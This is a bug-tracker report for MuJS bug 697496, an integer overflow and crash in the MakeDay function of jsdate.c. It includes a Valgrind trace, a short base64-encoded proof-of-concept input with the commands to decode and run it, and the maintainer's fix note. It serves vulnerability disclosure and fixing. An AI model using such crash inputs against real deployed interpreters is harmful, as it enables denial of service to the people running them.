Bug 697496 - Integer overflow and crash in MakeDay function in jsdate.c
Summary: Integer overflow and crash in MakeDay function in jsdate.c
Status: RESOLVED FIXED
Alias: None
Product: MuJS
Classification: Unclassified
Component: general (show other bugs)
Version: unspecified
Hardware: PC Windows NT
: P4 normal
Assignee: Tor Andersson
QA Contact: Bug traffic
URL:
Keywords:
Depends on:
Blocks:
 
Reported: 2017-01-23 04:39 UTC by op7ic
Modified: 2017-01-24 06:30 UTC (History)
0 users

See Also:
Customer:
Word Size: ---


Attachments

Note You need to log in before you can comment on or make changes to this bug.
Description op7ic 2017-01-23 04:39:15 UTC
Howdy there is a int overflow in MakeDay function in jsdate.c source when parsing corrupted JS input.

Version:
latest from git as of 23/01/2017

Vulnerable Source file: 
mujs/jsdate.c

Function:
MakeDay 

Compile Flags
CFLAGS += -g3 -ggdb -O0

Compile Command: 
make


Valgrind shows it pretty clear: 

valgrind ./mujs-clean/build/mujs PoC.js
==14642== Memcheck, a memory error detector
==14642== Copyright (C) 2002-2013, and GNU GPL'd, by Julian Seward et al.
==14642== Using Valgrind-3.10.0 and LibVEX; rerun with -h for copyright info
==14642== Command: ./mujs-clean/build/mujs PoC.js
==14642==
==14642== Invalid read of size 8
==14642==    at 0x428B29: MakeDay (jsdate.c:215)
==14642==    by 0x429A20: jsB_new_Date (jsdate.c:430)
==14642==    by 0x406F77: jsR_callcfunction (jsrun.c:1023)
==14642==    by 0x4073C6: js_construct (jsrun.c:1092)
==14642==    by 0x408C0F: jsR_run (jsrun.c:1472)
==14642==    by 0x406EBD: jsR_callscript (jsrun.c:1006)
==14642==    by 0x407240: js_call (jsrun.c:1061)
==14642==    by 0x4029F2: js_dofile (jsstate.c:150)
==14642==    by 0x4021F9: main (main.c:206)
==14642==  Address 0xfffffffc00434ac0 is not stack'd, malloc'd or (recently) free'd
==14642==
==14642==
==14642== Process terminating with default action of signal 11 (SIGSEGV)
==14642==  Access not within mapped region at address 0xFFFFFFFC00434AC0
==14642==    at 0x428B29: MakeDay (jsdate.c:215)
==14642==    by 0x429A20: jsB_new_Date (jsdate.c:430)
==14642==    by 0x406F77: jsR_callcfunction (jsrun.c:1023)
==14642==    by 0x4073C6: js_construct (jsrun.c:1092)
==14642==    by 0x408C0F: jsR_run (jsrun.c:1472)
==14642==    by 0x406EBD: jsR_callscript (jsrun.c:1006)
==14642==    by 0x407240: js_call (jsrun.c:1061)
==14642==    by 0x4029F2: js_dofile (jsstate.c:150)
==14642==    by 0x4021F9: main (main.c:206)
==14642==  If you believe this happened as a result of a stack
==14642==  overflow in your program's main thread (unlikely but
==14642==  possible), you can try to increase the size of the
==14642==  main thread stack using the --main-stacksize= flag.
==14642==  The main thread stack size used in this run was 8388608.
==14642==
==14642== HEAP SUMMARY:
==14642==     in use at exit: 130,649 bytes in 1,280 blocks
==14642==   total heap usage: 1,515 allocs, 235 frees, 152,792 bytes allocated
==14642==
==14642== LEAK SUMMARY:
==14642==    definitely lost: 0 bytes in 0 blocks
==14642==    indirectly lost: 0 bytes in 0 blocks
==14642==      possibly lost: 0 bytes in 0 blocks
==14642==    still reachable: 130,649 bytes in 1,280 blocks
==14642==         suppressed: 0 bytes in 0 blocks
==14642== Rerun with --leak-check=full to see details of leaked memory
==14642==
==14642== For counts of detected and suppressed errors, rerun with: -v
==14642== ERROR SUMMARY: 1 errors from 1 contexts (suppressed: 0 from 0)
Segmentation fault

PoC (base64 encoded):
bmV3ICBEYXRlICgxLCBEYXRlKS5sCg==

PoC execution:

base64 -d /tmp/b64PoC.poc > /tmp/proof.js
valgrind ./mujs-clean/build/mujs /tmp/proof.js
Comment 1 Tor Andersson 2017-01-24 06:30:25 UTC
Fixed in commit 8f62ea10a0af68e56d5c00720523ebcba13c2e6a
Author: Tor Andersson <tor.andersson@gmail.com>
Date:   Tue Jan 24 14:32:14 2017 +0100

    Fix 697496: Check NAN before accessing array in MakeDay().